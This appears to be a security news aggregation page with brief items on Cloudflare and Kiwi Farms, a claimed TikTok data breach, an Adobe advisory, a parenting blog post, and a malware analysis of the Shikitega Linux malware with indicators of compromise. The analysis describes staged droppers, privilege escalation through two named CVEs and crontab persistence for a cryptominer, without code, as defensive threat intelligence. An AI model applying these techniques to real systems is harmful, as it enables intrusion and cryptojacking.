Transparency and policy shapes Cloudflare’s Kiwi Farms decisions

Read Time:53 Second

Cloudflare percolated back into the news cycle last week when the company, which provides security services to websites, blocked Kiwi Farms as a client. Kiwi Farms has a reputation as being the worst trolling site on the internet, where individuals meet to collate and create action plans targeting individuals for both online and physical harassment including doxing and swatting (taking action that results in a police SWAT team arriving at a given address to neutralize the reported threat to life).

Social networks were aflame with calls for Cloudflare to cease providing their services to Kiwi Farms. Indeed, a recent Vice article highlighted the case of Clara Sorrenti, also known as Keffals, an online streamer who has been doxed multiple times and was arrested on August 5 amidst a raid on her home as a result of swatting, highlighted how there have been at least three cases of individuals committing suicide as a result of the targeted harassment received as a result of the actions taking place on Kiwifarms.

To read this article in full, please click here

Read More

TikTok denies breach after hackers claim billions of user records stolen

Read Time:36 Second

TikTok is denying claims that a hacking group has breached an Alibaba cloud database containing 2.05 billion records that include data on TikTok and WeChat users.

The hacking group, which goes by the name AgainstTheWest, on Friday posted screenshots—which they say were taken from the hacked database—on a hacking forum.

The Alibaba server that was breached contains 2.05 billion records in a 790GB database with user data, platform statistics, source code, cookies, auth tokens, server info, and other information, the hacking group said. The hackers also claimed they are yet to decide if they want to sell the data or release it to the public. 

To read this article in full, please click here

Read More

Multiple Vulnerabilities in Adobe Products Could Allow for Arbitrary Code Execution.

Read Time:48 Second

Multiple vulnerabilities have been discovered in Adobe products, the most severe of which could allow for arbitrary code execution.

Adobe Commerce is an offering that provides companies with a flexible and scalable end-to-end plate form to manage commerce experiences of their customers.
Adobe Acrobat and Reader are used to view, create, print, and mange PDF files.
Illustrator is a vector graphics editor and design program.
Framemaker is a document processor designed for writing and editing large or complex documents.
Premiere Elements is a video editing software similar to Premiere Pro.
Successful exploitation of the most severe of these vulnerabilities could allow for arbitrary code execution. Depending on the privileges associated with the user, an attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.

Read More

Kicking Off a New School Year with New Online Habits

Read Time:4 Minute, 9 Second

Most every parent loves a new school year. Most likely because the beloved milestone offers us a clean slate and a chance to do things better, shape new habits, and close those digital safety gaps.

The hope that fuels change is a powerful thing. However, if you want to ensure your new habits stick, there’s some science you might consider. Psychologists suggest that to make a new change permanent, you should start with smaller, micro-size choices that will lead to sustainable patterns and habits. Micro habits allow you to take safe steps that are too small to fail but effective enough to generate long-term change. 

Committing to Micro-Habits 

Breaking down the task online safety into bite-sized pieces is a great approach for parents eager to put better habits into play this year. Establishing new ground rules doesn’t have to include restrictions, tantrums, or tears. You can start small, commit to work together, and build your new habits over time. 

So often in this blog we offer a combination of practical digital tips proven to work such as robust password protocols, privacy settings, parental controls, smart phone protection, and social network/app safety.  

Today, however, we will flip that approach and give you some foundations that will no doubt support and amplify your family’s daily online safety efforts. Ready? Here we go! 

5 Foundations of Healthy Family Tech Habits 

1. Put connection first.

We’re all connected 24/7 but to what? Equipping kids to make wise decisions online begins with intentional, face-to-face connection at home with a parent or caregiver. When the parent-child relationship is strong, trust grows, and conversation flows. If and when a challenge arises, your child is more likely to turn to you.  

Micro-habit: If your family doesn’t eat dinner together, start with one night a week (stay consistent with the day). Make the dinner table a no-phone zone and spend that time together listening and connecting. Build from there.  

 

2. Step into their world. 

The new school year is a chance to get more involved with your child’s day-to-day communities (on and offline), including their teachers, friend groups, or hobbies. If you’ve been on the sidelines in the past, taking a few steps into their world can give you an exceptional understanding of their online life. Knowing where they go and who they know online has never been more critical, as outlined in our recent Connected Family Report. 

Micro-habit: Does your child have a favorite app? Download it, look around, and understand the culture.  

3. Prioritize sleep. 

Summer—coupled with extra time online (often unmonitored)—can wreak havoc on a child’s sleep patterns, which, in turn, wreaks havoc on a family. If you have a tween or teen, ensuring they get the required hours of sleep is a significant way to keep them safe online. Think about it. Fatigue can impair judgment, increase anxiety, impact grades, and magnify moodiness, putting a child’s physical and emotional wellbeing at risk online and off.  

Micro-habit: Think about setting a phone curfew that everyone agrees on. Giving your child input into the curfew makes it less of a restriction and more of a health or lifestyle shift. Remember, your child’s device is their lifeline to their peers so cutting them off isn’t a long-term solution.  

4. Monitor mental health. 

With kids spending so much time on apps like TikTok, Instagram, Snapchat, and YouTube, those platforms inevitably influence your child more than just about anyone. Be on the lookout for behavior changes in your child that may be connected to digital risks such as cyberbullying, sextortion, gaming addiction, inappropriate content, or connecting with strangers.

Micro-habit: Consider setting time limits that allow your child to enjoy their online hangouts without being consumed or overly influenced by the wrong voices. Apply limits in small blocks at first and grow from there.  

5. Aim for balance. 

Balancing your online life with face-to-face activities and relationships is a must for your child’s physical and emotional wellbeing. But sometimes, striving for that balance can feel overwhelming. Being too stringent can cause big plans to collapse, sending our behaviors in the opposite direction. Balance requires constant re-calibration and pausing to take those small bites. 

Micro-habit: Commit to one family outdoor activity together a month. Take a hike, learn to fish, take up tennis. Make the outings phone-free zones. Be consistent with your monthly micro-habit and build from there.  

It’s been proven that any change you attempt to make ignites a degree of friction. And prolonged friction can discourage your efforts to stick to new habits. Ignore that noise and keep moving forward. Stay the course parents because this is the year your best intentions take shape.   

The post Kicking Off a New School Year with New Online Habits appeared first on McAfee Blog.

Read More

Shikitega – New stealthy malware targeting Linux

Read Time:7 Minute, 12 Second

Executive summary

AT&T Alien Labs has discovered a new malware targeting endpoints and IoT devices that are running Linux operating systems. Shikitega is delivered in a multistage infection chain where each module responds to a part of the payload and downloads and executes the next one. An attacker can gain full control of the system, in addition to the cryptocurrency miner that will be executed and set to persist.

Key takeaways:

The malware downloads and executes the Metasploit’s “Mettle” meterpreter to maximize its control on infected machines.
Shikitega exploits system vulnerabilities to gain high privileges, persist and execute crypto miner.
The malware uses a polymorphic encoder to make it more difficult to detect by anti-virus engines.
Shikitega abuse legitimate cloud services to store some of its command and control servers (C&C).

Figure 1. Shikitega operation process.

Background

With a rise of nearly 650% in malware and ransomware for Linux this year, reaching an all-time high in the first half year of 2022, threat actors find servers, endpoints and IoT devices based on Linux operating systems more and more valuable and find new ways to deliver their malicious payloads. New malwares like BotenaGo and EnemyBot are examples of how malware writers rapidly incorporate  recently discovered vulnerabilities to find new victims and increase their reach.

Shikitega uses an infection chain in multiple layers, where the first one contains only a few hundred bytes, and each module is responsible for a specific task, from downloading and executing Metasploit meterpreter, exploiting Linux vulnerabilities, setting persistence in the infected machine to downloading and executing a cryptominer.

Analysis

The main dropper of the malware is a very small ELF file, where its total size is around only 370 bytes, while its actual code size is around 300 bytes. (figure 2)

Figure 2. Malicious ELF file with a total of only 376 bytes.

The malware uses the “Shikata Ga Nai” polymorphic XOR additive feedback encoder, which is one of the most popular encoders used in Metasploit. Using the encoder, the malware runs through several decode loops, where one loop decodes the next layer, until the final shellcode payload is decoded and executed. The encoder stud is generated based on dynamic instruction substitution and dynamic block ordering. In addition, registers are selected dynamically.  Below we can see how the encoder decrypts the first two loops: (figures 3 and 4)

Figure 3. First “Shikata Ga Nai” decryption loop.

Figure 4. Second “Shikata Ga Nai” decryption loop created by the first one.

After several decryption loops, the final payload shellcode will be decrypted and executed. As the malware does not use any imports, it uses ‘int 0x80’ to execute the appropriate syscall. As the main dropper code is very small, the malware will download and execute additional commands from its command and control by calling 102 syscall (sys_socketcall). (Figure 5)

Figure 5. Calling system functions using interrupts

The C&C will respond with additional shell commands to execute, as seen in the packet capture in figure 6. The first bytes marked in blue are the shell commands that the malware will execute.

Figure 6. Additional commands received from C&C.

The received command will download additional files from the server that won’t be stored in the hard drive, but rather will be executed from memory only. (Figure 7)

Figure 7. Executes additional shell code received from C&C.

In other malware versions, it will use the “execve” syscall to execute ‘/bin/sh’ with command received from the C&C. (figure 8)

Figure 8. Executing shell commands by using syscall_execve.

The malware downloads and executes ‘Mettle’, a Metasploit meterpreter that allows the attacker to use a wide range of attacks from webcam control, sniffer, multiple reverse shells (tcp/http..), process control, execute shell commands and more. 

In addition the malware will use wget to download and execute the next stage dropper.

Next stage dropper

The next downloaded and executed file is an additional small ELF file (around 1kb) encoded with the “Shikata Ga Nai” encoder. The malware decrypts a shell command that will be executed by calling syscall_execve with ‘/bin/sh” as a parameter with the decrypted shell. (Figure 9)

Figure 9. Second stage dropper decrypts and executes shell commands.

The executed shell command will download and execute additional files. To execute the next and last stage dropper, it will exploit two linux vulnerabilities to leverage privileges – CVE-2021-4034 and CVE-2021-3493 (figure 10 and 11).

Figure 10. Exploiting Linux vulnerability CVE-2021-3493.

Figure 11. Exploiting CVE-2021-4034 vulnerability.

The malware will leverage the exploit to download and execute the final stage with root privileges – persistence and cryptominer payload.

Persistence

To achieve persistence, the malware will download and execute a total of 5 shell scripts. It persists in the system by setting 4 crontabs, two for the current logged in user and the other two for the user root. It will first check if the crontab command exists on the machine, and if not, the malware will install it and start the crontab service.

To make sure only one instance is running, it will use the flock command with a lock file “/var/tmp/vm.lock”.

Figure 12. Adding root crontab to execute the final payload.

Below is the list of downloaded and executed script to achieve persistence:

script name

details

unix.sh

Check if “crontab” commands exist in the system, if not install it and start the crontab service.

brict.sh

Adds crontab for current user to execute cryptominer.

politrict.sh

Adds root crontab to execute cryptominer.

truct.sh

Adds crontab for current user to download cryptominer and config from C&C.

restrict.sh

Adds root crontab to download cryptominer and config from C&C.

 

As the malware persists with crontabs, it will delete all downloaded files from the system to hide its presence.

Cryptominer payload

The malware downloads and executes XMRig miner, a popular miner for the Monero cryptocurrency. It will also set a crontab to download and execute the crypto miner and config from the C&C as mentioned in the persistence part above.

Figure 13. XMRig miner is downloaded and executed on an infected machine.

Command and control

Shikitega uses cloud solutions to host some of its command and control servers (C&C) as shown by OTX in figure 14. As the malware in some cases contacts the command and control server using directly the IP without domain name, it’s difficult to provide a complete list of indicators for detections since they are volatile and they will be used for legitimate purposes in a short period of time.

Figure 14. Command and control server hosted on a legitimate cloud hosting service.

Recommended actions

Keep software up to date with security updates.
Install Antivirus and/or EDR in all endpoints.
Use a backup system to backup server files.

Conclusion

Threat actors continue to search for ways to deliver malware in new ways to stay under the radar and avoid detection. Shiketega malware is delivered in a sophisticated way, it uses a polymorphic encoder, and it gradually delivers its payload where each step reveals only part of the total payload. In addition, the malware abuses known hosting services to host its command and control servers. Stay safe!

Associated Indicators (IOCs)

The following technical indicators are associated with the reported intelligence. A list of indicators is also available in the OTX Pulse. Please note, the pulse may include other activities related but out of the scope of the report.

TYPE

INDICATOR

DESCRIPTION

DOMAIN

dash[.]cloudflare.ovh

Command and control

DOMAIN

main[.]cloudfronts.net

Command and control

SHA256

b9db845097bbf1d2e3b2c0a4a7ca93b0dc80a8c9e8dbbc3d09ef77590c13d331

Malware hash

SHA256

0233dcf6417ab33b48e7b54878893800d268b9b6e5ca6ad852693174226e3bed

Malware hash

SHA256

f7f105c0c669771daa6b469de9f99596647759d9dd16d0620be90005992128eb

Malware hash

SHA256

8462d0d14c4186978715ad5fa90cbb679c8ff7995bcefa6f9e11b16e5ad63732

Malware hash

SHA256

d318e9f2086c3cf2a258e275f9c63929b4560744a504ced68622b2e0b3f56374

Malware hash

SHA256

fc97a8992fa2fe3fd98afddcd03f2fc8f1502dd679a32d1348a9ed5b208c4765

Malware hash

SHA256

e4a58509fea52a4917007b1cd1a87050b0109b50210c5d00e08ece1871af084d

Malware hash

SHA256

cbdd24ff70a363c1ec89708367e141ea2c141479cc4e3881dcd989eec859135d

Malware hash

SHA256

d5bd2b6b86ce14fbad5442a0211d4cb1d56b6c75f0b3d78ad8b8dd82483ff4f8

Malware hash

SHA256

29aafbfd93c96b37866a89841752f29b55badba386840355b682b1853efafcb8

Malware hash

SHA256

4ed78c4e90ca692f05189b80ce150f6337d237aaa846e0adf7d8097fcebacfe7

Malware hash

SHA256

130888cb6930500cf65fc43522e2836d21529cab9291c8073873ad7a90c1fbc5

Malware hash

SHA256

3ce8dfaedb3e87b2f0ad59e1c47b9b6791b99796d38edc3a72286f4b4e5dc098

Malware hash

SHA256

6b514e9a30cbb4d6691dd0ebdeec73762a488884eb0f67f8594e07d356e3d275

Malware hash

SHA256

7c70716a66db674e56f6e791fb73f6ce62ca1ddd8b8a51c74fc7a4ae6ad1b3ad

Malware hash

SHA256

2b305939d1069c7490b3539e2855ed7538c1a83eb2baca53e50e7ce1b3a165ab

Malware hash CVE-2021-3493

SHA256

4dcae1bddfc3e2cb98eae84e86fb58ec14ea6ef00778ac5974c4ec526d3da31f

Malware hash CVE-2021-4034

SHA256

e8e90f02705ecec9e73e3016b8b8fe915873ed0add87923bf4840831f807a4b4

Malware hash

SHA256

64a31abd82af27487985a0c0f47946295b125e6d128819d1cbd0f6b62a95d6c4

Malware shell script

SHA256

623e7ad399c10f0025fba333a170887d0107bead29b60b07f5e93d26c9124955

Malware shell script

SHA256

59f0b03a9ccf8402e6392e07af29e2cfa1f08c0fc862825408dea6d00e3d91af

Malware shell script

SHA256

9ca4fbfa2018fe334ca8f6519f1305c7fbe795af9eb62e9f58f09e858aab7338

Malware shell script

SHA256

05727581a43c61c5b71d959d0390d31985d7e3530c998194670a8d60e953e464

Malware shell script

SHA256

ea7d79f0ddb431684f63a901afc596af24898555200fc14cc2616e42ab95ea5d

Malware hash

Mapped to MITRE ATT&CK

The findings of this report are mapped to the following MITRE ATT&CK Matrix techniques:

TA0002: Execution

T1059: Command and Scripting Interpreter
T1569: System Service

T1569.002: Service Execution

TA0003: Persistence

T1543: Create or Modify System Process

TA0005: Defense Evasion

T1027: Obfuscated Files or Information

Read More